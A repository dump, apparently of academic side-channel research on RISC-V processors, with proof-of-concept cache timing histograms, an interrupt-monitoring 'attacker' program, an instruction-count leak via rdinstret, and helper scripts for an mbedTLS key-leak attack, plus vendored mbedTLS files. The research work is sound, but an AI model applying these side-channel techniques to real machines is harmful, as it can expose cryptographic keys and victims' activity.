`hist-c906` if testing on the C906 processor and `hist-u74` if testing on the U74 processor. 8 | 9 | # Works on 10 | C906, U74 -------------------------------------------------------------------------------- /fence-flush/Makefile: -------------------------------------------------------------------------------- 1 | all: hist 2 | 3 | hist: hist.c 4 | gcc hist.c -Os -o hist 5 | 6 | clean: 7 | rm -f hist 8 | 9 | -------------------------------------------------------------------------------- /fence-flush/README.md: -------------------------------------------------------------------------------- 1 | # Instruction Flush+Reload Histogram 2 | 3 | Prints a simple Flush+Reload histogram for the instruction cache. 4 | To flush, the PoC uses the `fence.i` instruction which flushes the entire instruction cache. 5 | 6 | # Run Code 7 | Run `make` then `./hist` 8 | 9 | # Works on 10 | C906,U74,C910,C908 -------------------------------------------------------------------------------- /fgprime_probe_histogram/Makefile: -------------------------------------------------------------------------------- 1 | all: hist 2 | 3 | hist: hist.c 4 | gcc hist.c -Os -o hist 5 | 6 | clean: 7 | rm -f hist 8 | 9 | -------------------------------------------------------------------------------- /fgprime_probe_histogram/README.md: -------------------------------------------------------------------------------- 1 | # "Fine-grained" Prime+Probe Histogram 2 | Prints multiple Prime+Probe histograms, depending on how many ways have been evicted. 3 | 4 | # Run Code 5 | Run `make` then `./hist` 6 | 7 | # Works on 8 | C906 (because of FIFO cache replacement strategy) -------------------------------------------------------------------------------- /flush-fault/Makefile: -------------------------------------------------------------------------------- 1 | all: flush-fault flush-ret 2 | 3 | flush-fault: flush-fault.c 4 | gcc flush-fault.c -o flush-fault 5 | 6 | flush-ret: flush-ret.c 7 | gcc flush-ret.c -o flush-ret 8 | 9 | 10 | clean: 11 | rm -f flush-ret flush-fault *.csv 12 | -------------------------------------------------------------------------------- /flush-fault/README.md: -------------------------------------------------------------------------------- 1 | # Instruction Flush+Fault PoCs 2 | 3 | Contains one PoC for the default Flush+Fault (`./flush-fault.c`) and one for the return-based variant (`./flush-ret.c`). 4 | 5 | 6 | # Run Code 7 | Run `make` then `./flush-fault` or `./flush-ret`. 8 | Afterward, execute `python3 stats.py flush-fault` or `python3 stats.py flush-ret`. 9 | 10 | # Works on 11 | C906,U74,C910,C908 -------------------------------------------------------------------------------- /flush_flush_histogram/Makefile: -------------------------------------------------------------------------------- 1 | all: hist 2 | 3 | hist: hist.c 4 | gcc hist.c -DC906 -Os -o hist 5 | 6 | clean: 7 | rm -f hist 8 | 9 | -------------------------------------------------------------------------------- /flush_flush_histogram/README.md: -------------------------------------------------------------------------------- 1 | # Flush+Flush (Dirty) Histogram 2 | 3 | Prints a simple Flush+Flush histogram. 4 | To flush, the PoC uses the custom C906 instruction `dcache.civa` which flushes a virtual address from the data cache. 5 | 6 | # Run Code 7 | Run `make` then `./hist` 8 | 9 | # Works on 10 | C906,C910,C908 (because custom cache flush instruction) -------------------------------------------------------------------------------- /flush_reload_histogram/Makefile: -------------------------------------------------------------------------------- 1 | all: hist 2 | 3 | hist: hist.c 4 | gcc hist.c -DC906 -Os -o hist 5 | 6 | clean: 7 | rm -f hist 8 | 9 | -------------------------------------------------------------------------------- /flush_reload_histogram/README.md: -------------------------------------------------------------------------------- 1 | # Flush+Reload Histogram 2 | 3 | Prints a simple Flush+Reload histogram. 4 | To flush, the PoC uses the custom C906 instruction `dcache.civa` which flushes a virtual address from the data cache. 5 | 6 | # Run Code 7 | Run `make` then `./hist` 8 | 9 | # Works on 10 | C906, C910, C908 (because custom cache flush instruction) -------------------------------------------------------------------------------- /iflush_reload_histogram/Makefile: -------------------------------------------------------------------------------- 1 | all: hist 2 | 3 | hist: hist.c 4 | gcc hist.c -DC906 -Os -o hist 5 | 6 | clean: 7 | rm -f hist 8 | 9 | -------------------------------------------------------------------------------- /iflush_reload_histogram/README.md: -------------------------------------------------------------------------------- 1 | # Instruction Flush+Reload Histogram 2 | 3 | Prints a simple Flush+Reload histogram for the instruction cache. 4 | To flush, the PoC uses the custom C906 instruction `icache.iva` which flushes a virtual address from the instruction cache. 5 | 6 | # Run Code 7 | Run `make` then `./hist` 8 | 9 | # Works on 10 | C906, C910, C908 (because custom cache flush instruction) -------------------------------------------------------------------------------- /inst-cycles/Makefile: -------------------------------------------------------------------------------- 1 | all: main 2 | 3 | main: main.c 4 | gcc main.c -Os -o main 5 | 6 | clean: 7 | rm -f main cycles.csv timings.csv 8 | 9 | -------------------------------------------------------------------------------- /inst-cycles/README.md: -------------------------------------------------------------------------------- 1 | # Instruction Benchmark 2 | Measure the execution time (in cycles) of instructions. 3 | 4 | # Run Code 5 | Simply `make; ./main` 6 | 7 | # Works on 8 | C906,U74,C910,C908 -------------------------------------------------------------------------------- /interrupt-timing/Makefile: -------------------------------------------------------------------------------- 1 | all: attacker 2 | 3 | attacker: attacker.c 4 | gcc attacker.c -Os -o attacker 5 | 6 | clean: 7 | rm -f attacker 8 | 9 | -------------------------------------------------------------------------------- /interrupt-timing/README.md: -------------------------------------------------------------------------------- 1 | # Interrupt timing exeriments 2 | These experiments show that an attacks is able to monitor network interrupts send to a machine. 3 | 4 | # How to run 5 | Running `make; ./attacker` starts the attacker process which monitors for timing differences in execution induced by network interrupts. 6 | To test that the attacker works you will have to send network interrupts to the machine. 7 | To test, run the program and from a different machine run `ping -s 50000 -i 3 `. 8 | 9 | # Works on 10 | C906,U74,C910,C908 11 | -------------------------------------------------------------------------------- /interrupt-timing/attacker.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define ARR_LEN 3000 8 | // Use tow thresholds to filter the right interrupt band 9 | #define THRESH_LO 1000 10 | 11 | static inline uint64_t rdcycle() { 12 | uint64_t val; 13 | asm volatile("rdcycle %0" : "=r"(val)); 14 | return val; 15 | } 16 | 17 | uint64_t event[ARR_LEN]; 18 | uint64_t delta_event[ARR_LEN]; 19 | 20 | void main() { 21 | uint64_t start, end, delta; 22 | uint64_t idx = 1; 23 | event[0] = rdcycle(); 24 | printf("[+] Starting measurement\n"); 25 | while (idx < ARR_LEN) { 26 | start = rdcycle(); 27 | end = rdcycle(); 28 | delta = end - start; 29 | if (delta > THRESH_LO) { 30 | event[idx] = start; 31 | delta_event[idx] = event[idx] - event[idx - 1]; 32 | idx++; 33 | } 34 | } 35 | printf("[+] Measurement ended, dumping to file\n"); 36 | FILE *logfile = fopen("log", "w"); 37 | fprintf(logfile, "event,delta\n"); 38 | for (size_t i = 0; i < ARR_LEN; i++) { 39 | fprintf(logfile, "%ld,%ld\n", event[i], delta_event[i]); 40 | } 41 | printf("[+] Results dumped\n"); 42 | } 43 | -------------------------------------------------------------------------------- /m-mode-instr-count/Makefile: -------------------------------------------------------------------------------- 1 | all: example.c 2 | gcc example.c -o example 3 | 4 | clean: 5 | rm -f example 6 | -------------------------------------------------------------------------------- /m-mode-instr-count/README.md: -------------------------------------------------------------------------------- 1 | # Code showing that the rdinstret instruction leaks instruction counts in M-Mode 2 | We show that an attacker can observe the number of isntructions executed in the privileged M-Mode using the `rdinstret` instruction. 3 | 4 | # Run the code 5 | Build the kernel module 6 | ``` 7 | cd module 8 | make 9 | sudo insmod sample.ko 10 | ``` 11 | Then build the `example.c` file with `make` and run it with `./example` 12 | 13 | # Works on 14 | C906, U74 -------------------------------------------------------------------------------- /m-mode-instr-count/example.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include "module/sample.h" 8 | 9 | static uint64_t rdcycle(void) { 10 | uint64_t val; 11 | // asm volatile ("rdcycle %0" : "=r"(val)); 12 | asm volatile ("rdinstret %0" : "=r"(val)); 13 | // asm volatile ("rdtime %0" : "=r"(val)); 14 | return val; 15 | } 16 | 17 | int main() { 18 | // open the module 19 | int fd = open(MODULE_DEVICE_PATH, O_RDONLY); 20 | if (fd < 0) { 21 | fprintf(stderr, "Error: Could not open module: %s\n", MODULE_DEVICE_PATH); 22 | return -1; 23 | } 24 | 25 | size_t sum1 = 0, sum2 = 0, sum1u = 0, sum2u = 0; 26 | size_t val1 = 0, val2 = 0; 27 | for(int i = 0; i < 1000; i++) { 28 | size_t start = rdcycle(); 29 | ioctl(fd, MODULE_IOCTL_CMD_INC, (unsigned long)&val1); 30 | sum1u += rdcycle() - start; 31 | start = rdcycle(); 32 | ioctl(fd, MODULE_IOCTL_CMD_INC2, (unsigned long)&val2); 33 | sum2u += rdcycle() - start; 34 | sum1 += val1; 35 | sum2 += val2; 36 | } 37 | printf("1: %10zd | %10zd\n", sum1 / 1000, sum1u / 1000); 38 | printf("2: %10zd | %10zd\n", sum2 / 1000, sum2u / 1000); 39 | 40 | close(fd); 41 | } 42 | -------------------------------------------------------------------------------- /m-mode-instr-count/module/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += sample.o 2 | ccflags-y += -Wno-unused-result 3 | all: 4 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 5 | clean: 6 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 7 | 8 | -------------------------------------------------------------------------------- /m-mode-instr-count/module/sample.h: -------------------------------------------------------------------------------- 1 | #ifndef _MODULE_H 2 | #define _MODULE_H 3 | 4 | #include 5 | 6 | #define MODULE_DEVICE_NAME "sample" 7 | #define MODULE_DEVICE_PATH "/dev/" MODULE_DEVICE_NAME 8 | 9 | 10 | #define MODULE_IOCTL_MAGIC_NUMBER (long)0xf00f00 11 | 12 | #define MODULE_IOCTL_CMD_INC \ 13 | _IOR(MODULE_IOCTL_MAGIC_NUMBER, 1, size_t) 14 | // ^-- command name ^-- unique command ID 15 | #define MODULE_IOCTL_CMD_INC2 \ 16 | _IOR(MODULE_IOCTL_MAGIC_NUMBER, 2, size_t) 17 | // ^-- command name ^-- unique command ID 18 | 19 | #endif 20 | -------------------------------------------------------------------------------- /mbedtls-key-leak/build.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | 3 | import subprocess 4 | from pathlib import Path 5 | 6 | LIBPATH = "./libmbedtls.so.8" 7 | OFFSET_HEADERFILE = "./attack_offsets.h" 8 | 9 | def execute_cmd(s): 10 | return subprocess.run(s, shell=True) 11 | 12 | 13 | def generate_headerfile(headerfname, mpi_exp_mod_offset, one_offset): 14 | template = """// generated by build.py 15 | #ifndef ATTACK_OFFSETS_H 16 | #define ATTACK_OFFSETS_H 17 | 18 | #define MPI_EXP_MOD_OFFSET 0x{mpi_offset:x} 19 | #define ONE_OFFSET 0x{one_offset:x} 20 | 21 | #endif /* !ATTACK_OFFSETS_H */ 22 | """ 23 | header_content = template.format(mpi_offset=mpi_exp_mod_offset, 24 | one_offset=one_offset) 25 | 26 | with open(headerfname, "w") as fd: 27 | fd.write(header_content) 28 | 29 | 30 | def build_library(): 31 | execute_cmd("make lib -C mbedtls") 32 | 33 | 34 | def main(): 35 | # create default header for first build 36 | if not Path(OFFSET_HEADERFILE).is_file(): 37 | print("Generating default header (actual offsets still required)") 38 | generate_headerfile(OFFSET_HEADERFILE, 0, 0) 39 | 40 | # always force recompilation of the important file 41 | execute_cmd("touch ./mbedtls/library/bignum.c") 42 | # build to generate binary 43 | build_library() 44 | 45 | 46 | if __name__ == "__main__": 47 | main() 48 | -------------------------------------------------------------------------------- /mbedtls-key-leak/generate_header.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | 3 | import subprocess 4 | 5 | from get_offsets import get_offsets 6 | 7 | LIBPATH = "./libmbedtls.so.8" 8 | OFFSET_HEADERFILE = "./attack_offsets.h" 9 | 10 | def execute_cmd(s): 11 | return subprocess.check_output(s, shell=True, timeout=10).decode() 12 | 13 | 14 | def generate_headerfile(headerfname, mpi_exp_mod_offset, one_offset): 15 | template = """// generated by build.py 16 | #ifndef ATTACK_OFFSETS_H 17 | #define ATTACK_OFFSETS_H 18 | 19 | #define MPI_EXP_MOD_OFFSET 0x{mpi_offset:x} 20 | #define ONE_OFFSET 0x{one_offset:x} 21 | 22 | #endif /* !ATTACK_OFFSETS_H */ 23 | """ 24 | header_content = template.format(mpi_offset=mpi_exp_mod_offset, 25 | one_offset=one_offset) 26 | 27 | with open(headerfname, "w") as fd: 28 | fd.write(header_content) 29 | 30 | 31 | def build_library(): 32 | execute_cmd("make -C mbedtls") 33 | 34 | 35 | def main(): 36 | # read out actual offsets from the binary and gen 37 | ctr_drbg_init_offset, mpi_exp_mod_offset, one_offset = get_offsets(LIBPATH) 38 | 39 | # generate header with actual offsets and rebuild library 40 | generate_headerfile(OFFSET_HEADERFILE, mpi_exp_mod_offset, one_offset) 41 | 42 | 43 | if __name__ == "__main__": 44 | main() 45 | -------------------------------------------------------------------------------- /mbedtls-key-leak/get_offsets.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | 3 | 4 | from pwn import * 5 | 6 | #LIB = "./mbedtls/library/libmbedtls.so" 7 | LIB = "./libmbedtls.so.8" 8 | 9 | def get_offsets(libpath): 10 | context.log_level = 'error' 11 | context.arch = 'riscv' 12 | e = ELF(LIB) 13 | ctr_drbg_init_offset = e.functions['ctr_drbg_init'].address 14 | print(f"[+] CTR_DRBG_INIT_OFFSET @ 0x{ctr_drbg_init_offset:x}") 15 | 16 | mpi_exp_mod_offset = e.functions['mpi_exp_mod'].address 17 | print(f"[+] MPI_EXP_MOD_OFFSET @ 0x{mpi_exp_mod_offset:x}") 18 | 19 | # c.nop, c.nop, c.nop, c.nop, unimpl, c.nop 20 | pattern_bytes = b"\x01\x00\x01\x00\x01\x00\x01\x00\x00\x00\x01\x00" 21 | 22 | patterns_found = e.search(pattern_bytes, executable=True) 23 | one_offset = next(patterns_found, None) 24 | if one_offset is None: 25 | print("\033[91m[-] Could not find ONE_OFFSET address\033[0m") 26 | exit(1) 27 | one_offset += 8 # increase to the the actual point of failure 28 | # assert that we only found one possible address 29 | assert next(patterns_found, None) == None 30 | print(f"[+] ONE_OFFSET @ 0x{one_offset:x}") 31 | return ctr_drbg_init_offset, mpi_exp_mod_offset, one_offset 32 | 33 | def main(): 34 | get_offsets(LIB) 35 | 36 | 37 | 38 | 39 | if __name__ == "__main__": 40 | main() 41 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Editor-based HTTP Client requests 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 29 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/DartConfiguration.tcl: -------------------------------------------------------------------------------- 1 | Site: localhost 2 | BuildName: mbed TLS-test 3 | CoverageCommand: /usr/bin/gcov 4 | MemoryCheckCommand: /usr/bin/valgrind 5 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/configs/README.txt: -------------------------------------------------------------------------------- 1 | This directory contains example configuration files. 2 | 3 | The examples are generally focused on a particular usage case (eg, support for 4 | a restricted number of ciphersuites) and aim at minimizing resource usage for 5 | this target. They can be used as a basis for custom configurations. 6 | 7 | These files are complete replacements for the default config.h. To use one of 8 | them, you can pick one of the following methods: 9 | 10 | 1. Replace the default file include/polarssl/config.h with the chosen one. 11 | (Depending on your compiler, you may need to ajust the line with 12 | #include "polarssl/check_config.h" then.) 13 | 14 | 2. Define POLARSSL_CONFIG_FILE and adjust the include path accordingly. 15 | For example, using make: 16 | 17 | CFLAGS="-I$PWD/configs -DPOLARSSL_CONFIG_FILE=''" make 18 | 19 | Or, using cmake: 20 | 21 | find . -iname '*cmake*' -not -name CMakeLists.txt -exec rm -rf {} + 22 | CFLAGS="-I$PWD/configs -DPOLARSSL_CONFIG_FILE=''" cmake . 23 | make 24 | 25 | Note that the second method also works if you want to keep your custom 26 | configuration file outside the mbed TLS tree. 27 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/configs/config-picocoin.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Reduced configuration used by Picocoin. 3 | * 4 | * See README.txt for usage instructions. 5 | * 6 | * Distinguishing features: 7 | * - no SSL/TLS; 8 | * - no X.509; 9 | * - ECDSA/PK and some other chosen crypto bits. 10 | */ 11 | 12 | #ifndef POLARSSL_CONFIG_H 13 | #define POLARSSL_CONFIG_H 14 | 15 | /* System support */ 16 | #define POLARSSL_HAVE_LONGLONG 17 | #define POLARSSL_HAVE_ASM 18 | #define POLARSSL_HAVE_TIME 19 | #define POLARSSL_HAVE_IPV6 20 | 21 | /* mbed TLS feature support */ 22 | #define POLARSSL_CIPHER_MODE_CBC 23 | #define POLARSSL_CIPHER_PADDING_PKCS7 24 | #define POLARSSL_ECP_DP_SECP256K1_ENABLED 25 | #define POLARSSL_ECDSA_DETERMINISTIC 26 | #define POLARSSL_PK_PARSE_EC_EXTENDED 27 | #define POLARSSL_ERROR_STRERROR_DUMMY 28 | #define POLARSSL_FS_IO 29 | 30 | /* mbed TLS modules */ 31 | #define POLARSSL_AESNI_C 32 | #define POLARSSL_AES_C 33 | #define POLARSSL_ASN1_PARSE_C 34 | #define POLARSSL_ASN1_WRITE_C 35 | #define POLARSSL_BASE64_C 36 | #define POLARSSL_BIGNUM_C 37 | #define POLARSSL_ECDSA_C 38 | #define POLARSSL_ECP_C 39 | #define POLARSSL_ENTROPY_C 40 | #define POLARSSL_HMAC_DRBG_C 41 | #define POLARSSL_MD_C 42 | #define POLARSSL_OID_C 43 | #define POLARSSL_PADLOCK_C 44 | #define POLARSSL_PK_C 45 | #define POLARSSL_PK_PARSE_C 46 | #define POLARSSL_PK_WRITE_C 47 | #define POLARSSL_RIPEMD160_C 48 | #define POLARSSL_SHA1_C 49 | #define POLARSSL_SHA256_C 50 | 51 | #include "check_config.h" 52 | 53 | #endif /* POLARSSL_CONFIG_H */ 54 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/configs/config-psk-rc4-tls1_0.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Custom compact configuration for TLS 1.0 with PSK and RC4 3 | * Distinguishing features: no bignum, no PK, no X509. 4 | * 5 | * WARNING: RC4 is in the process of being deprecated! 6 | * This configuration is kept for testing purposes only, DO NOT USE it! 7 | * For a safe and lean PSK-based configuration, see config-ccm-psk-tls1_2.h 8 | * 9 | * See README.txt for usage instructions. 10 | */ 11 | #ifndef POLARSSL_CONFIG_H 12 | #define POLARSSL_CONFIG_H 13 | 14 | /* System support */ 15 | //#define POLARSSL_HAVE_IPV6 /* Optional */ 16 | //#define POLARSSL_HAVE_TIME /* Optionnaly used in Hello messages */ 17 | /* Other POLARSSL_HAVE_XXX flags irrelevant for this configuration */ 18 | 19 | /* mbed TLS feature support */ 20 | #define POLARSSL_KEY_EXCHANGE_PSK_ENABLED 21 | #define POLARSSL_SSL_PROTO_TLS1 22 | #define POLARSSL_SSL_DISABLE_RENEGOTIATION 23 | 24 | /* mbed TLS modules */ 25 | #define POLARSSL_AES_C 26 | #define POLARSSL_ARC4_C 27 | #define POLARSSL_CIPHER_C 28 | #define POLARSSL_CTR_DRBG_C 29 | #define POLARSSL_ENTROPY_C 30 | #define POLARSSL_MD_C 31 | #define POLARSSL_MD5_C 32 | #define POLARSSL_NET_C 33 | #define POLARSSL_SHA1_C 34 | #define POLARSSL_SHA256_C 35 | #define POLARSSL_SSL_CLI_C 36 | #define POLARSSL_SSL_SRV_C 37 | #define POLARSSL_SSL_TLS_C 38 | 39 | #include "polarssl/check_config.h" 40 | 41 | #endif /* POLARSSL_CONFIG_H */ 42 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/doxygen/input/doc_hashing.h: -------------------------------------------------------------------------------- 1 | /** 2 | * @file 3 | * Hashing module documentation file. 4 | */ 5 | 6 | /** 7 | * @addtogroup hashing_module Hashing module 8 | * 9 | * The Hashing module provides one-way hashing functions. Such functions can be 10 | * used for creating a hash message authentication code (HMAC) when sending a 11 | * message. Such a HMAC can be used in combination with a private key 12 | * for authentication, which is a message integrity control. 13 | * 14 | * All hash algorithms can be accessed via the generic MD layer (see 15 | * \c md_init_ctx()) 16 | * 17 | * The following hashing-algorithms are provided: 18 | * - MD2, MD4, MD5 128-bit one-way hash functions by Ron Rivest (see 19 | * \c md2_hmac(), \c md4_hmac() and \c md5_hmac()). 20 | * - SHA-1, SHA-256, SHA-384/512 160-bit or more one-way hash functions by 21 | * NIST and NSA (see\c sha1_hmac(), \c sha256_hmac() and \c sha512_hmac()). 22 | * 23 | * This module provides one-way hashing which can be used for authentication. 24 | */ 25 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/doxygen/input/doc_rng.h: -------------------------------------------------------------------------------- 1 | /** 2 | * @file 3 | * Random number generator (RNG) module documentation file. 4 | */ 5 | 6 | /** 7 | * @addtogroup rng_module Random number generator (RNG) module 8 | * 9 | * The Random number generator (RNG) module provides random number 10 | * generation, see \c ctr_dbrg_random(). 11 | * 12 | * The block-cipher counter-mode based deterministic random 13 | * bit generator (CTR_DBRG) as specified in NIST SP800-90. It needs an external 14 | * source of entropy. For these purposes \c entropy_func() can be used. This is 15 | * an implementation based on a simple entropy accumulator design. 16 | * 17 | * The other number generator that is included is less strong and uses the HAVEGE 18 | * (HArdware Volatile Entropy Gathering and Expansion) software heuristic 19 | * which considered unsafe for primary usage, but provides additional random 20 | * to the entropy pool if enables. 21 | * 22 | * \* Meaning that there seems to be no practical algorithm that can guess 23 | * the next bit with a probability larger than 1/2 in an output sequence. 24 | * 25 | * This module can be used to generate random numbers. 26 | */ 27 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/doxygen/input/doc_ssltls.h: -------------------------------------------------------------------------------- 1 | /** 2 | * @file 3 | * SSL/TLS communication module documentation file. 4 | */ 5 | 6 | /** 7 | * @addtogroup ssltls_communication_module SSL/TLS communication module 8 | * 9 | * The SSL/TLS communication module provides the means to create an SSL/TLS 10 | * communication channel. 11 | * 12 | * The basic provisions are: 13 | * - initialise an SSL/TLS context (see \c ssl_init()). 14 | * - perform an SSL/TLS handshake (see \c ssl_handshake()). 15 | * - read/write (see \c ssl_read() and \c ssl_write()). 16 | * - notify a peer that connection is being closed (see \c ssl_close_notify()). 17 | * 18 | * Many aspects of such a channel are set through parameters and callback 19 | * functions: 20 | * - the endpoint role: client or server. 21 | * - the authentication mode. Should verification take place. 22 | * - the Host-to-host communication channel. A TCP/IP module is provided. 23 | * - the random number generator (RNG). 24 | * - the ciphers to use for encryption/decryption. 25 | * - session control functions. 26 | * - X.509 parameters for certificate-handling and key exchange. 27 | * 28 | * This module can be used to create an SSL/TLS server and client and to provide a basic 29 | * framework to setup and communicate through an SSL/TLS communication channel.\n 30 | * Note that you need to provide for several aspects yourself as mentioned above. 31 | */ 32 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/doxygen/input/doc_tcpip.h: -------------------------------------------------------------------------------- 1 | /** 2 | * @file 3 | * TCP/IP communication module documentation file. 4 | */ 5 | 6 | /** 7 | * @addtogroup tcpip_communication_module TCP/IP communication module 8 | * 9 | * The TCP/IP communication module provides for a channel of 10 | * communication for the \link ssltls_communication_module SSL/TLS communication 11 | * module\endlink to use. 12 | * In the TCP/IP-model it provides for communication up to the Transport 13 | * (or Host-to-host) layer. 14 | * SSL/TLS resides on top of that, in the Application layer, and makes use of 15 | * its basic provisions: 16 | * - listening on a port (see \c net_bind()). 17 | * - accepting a connection (through \c net_accept()). 18 | * - read/write (through \c net_recv()/\c net_send()). 19 | * - close a connection (through \c net_close()). 20 | * 21 | * This way you have the means to, for example, implement and use an UDP or 22 | * IPSec communication solution as a basis. 23 | * 24 | * This module can be used at server- and clientside to provide a basic 25 | * means of communication over the internet. 26 | */ 27 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/doxygen/input/doc_x509.h: -------------------------------------------------------------------------------- 1 | /** 2 | * @file 3 | * X.509 module documentation file. 4 | */ 5 | 6 | /** 7 | * @addtogroup x509_module X.509 module 8 | * 9 | * The X.509 module provides X.509 support which includes: 10 | * - X.509 certificate (CRT) reading (see \c x509parse_crt() and 11 | * \c x509parse_crtfile()). 12 | * - X.509 certificate revocation list (CRL) reading (see \c x509parse_crl() 13 | * and\c x509parse_crlfile()). 14 | * - X.509 (RSA and ECC) private key reading (see \c x509parse_key() and 15 | * \c x509parse_keyfile()). 16 | * - X.509 certificate signature verification (see \c x509parse_verify()) 17 | * - X.509 certificate writing and certificate request writing (see 18 | * \c x509write_crt_der() and \c x509write_csr_der()). 19 | * 20 | * This module can be used to build a certificate authority (CA) chain and 21 | * verify its signature. It is also used to generate Certificate Signing 22 | * Requests and X509 certificates just as a CA would do. 23 | */ 24 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/include/.gitignore: -------------------------------------------------------------------------------- 1 | Makefile 2 | *.sln 3 | *.vcxproj 4 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/include/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | option(INSTALL_MBEDTLS_HEADERS "Install mbed TLS headers." ON) 2 | 3 | if(INSTALL_MBEDTLS_HEADERS) 4 | 5 | file(GLOB headers "polarssl/*.h") 6 | 7 | install(FILES ${headers} 8 | DESTINATION include/polarssl 9 | PERMISSIONS OWNER_READ OWNER_WRITE GROUP_READ WORLD_READ) 10 | 11 | endif(INSTALL_MBEDTLS_HEADERS) 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/library/.gitignore: -------------------------------------------------------------------------------- 1 | *.o 2 | libpolarssl.* 3 | libmbedtls.* 4 | *.sln 5 | *.vcxproj 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/library/stJMMJFc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/library/stJMMJFc -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/.gitignore: -------------------------------------------------------------------------------- 1 | */Makefile 2 | *.sln 3 | *.vcxproj 4 | 5 | aes/aescrypt2 6 | aes/crypt_and_hash 7 | hash/generic_sum 8 | hash/hello 9 | hash/md5sum 10 | hash/sha1sum 11 | hash/sha2sum 12 | pkey/dh_client 13 | pkey/dh_genprime 14 | pkey/dh_server 15 | pkey/ecdsa 16 | pkey/gen_key 17 | pkey/key_app 18 | pkey/key_app_writer 19 | pkey/mpi_demo 20 | pkey/pk_decrypt 21 | pkey/pk_encrypt 22 | pkey/pk_sign 23 | pkey/pk_verify 24 | pkey/rsa_decrypt 25 | pkey/rsa_encrypt 26 | pkey/rsa_genkey 27 | pkey/rsa_sign 28 | pkey/rsa_sign_pss 29 | pkey/rsa_verify 30 | pkey/rsa_verify_pss 31 | random/gen_entropy 32 | random/gen_random_ctr_drbg 33 | random/gen_random_havege 34 | ssl/ssl_client1 35 | ssl/ssl_client2 36 | ssl/ssl_fork_server 37 | ssl/ssl_mail_client 38 | ssl/ssl_pthread_server 39 | ssl/ssl_server 40 | ssl/ssl_server2 41 | test/benchmark 42 | test/ecp-bench 43 | test/o_p_test 44 | test/selftest 45 | test/ssl_cert_test 46 | test/ssl_test 47 | util/pem2der 48 | util/strerror 49 | x509/cert_app 50 | x509/cert_req 51 | x509/crl_app 52 | x509/cert_write 53 | x509/req_app 54 | 55 | # generated files 56 | pkey/keyfile.key 57 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | add_subdirectory(aes) 2 | add_subdirectory(hash) 3 | add_subdirectory(pkey) 4 | add_subdirectory(random) 5 | add_subdirectory(ssl) 6 | add_subdirectory(test) 7 | add_subdirectory(x509) 8 | add_subdirectory(util) 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/aes/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | add_executable(aescrypt2 aescrypt2.c) 2 | target_link_libraries(aescrypt2 mbedtls) 3 | 4 | add_executable(crypt_and_hash crypt_and_hash.c) 5 | target_link_libraries(crypt_and_hash mbedtls) 6 | 7 | install(TARGETS aescrypt2 crypt_and_hash 8 | DESTINATION "bin" 9 | PERMISSIONS OWNER_READ OWNER_WRITE OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE) 10 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/hash/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | add_executable(hello hello.c) 2 | target_link_libraries(hello mbedtls) 3 | 4 | add_executable(generic_sum generic_sum.c) 5 | target_link_libraries(generic_sum mbedtls) 6 | 7 | add_executable(md5sum md5sum.c) 8 | target_link_libraries(md5sum mbedtls) 9 | 10 | add_executable(sha1sum sha1sum.c) 11 | target_link_libraries(sha1sum mbedtls) 12 | 13 | add_executable(sha2sum sha2sum.c) 14 | target_link_libraries(sha2sum mbedtls) 15 | 16 | install(TARGETS hello md5sum sha1sum sha2sum generic_sum 17 | DESTINATION "bin" 18 | PERMISSIONS OWNER_READ OWNER_WRITE OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE) 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/programs/pkey/dh_prime.txt: -------------------------------------------------------------------------------- 1 | P = 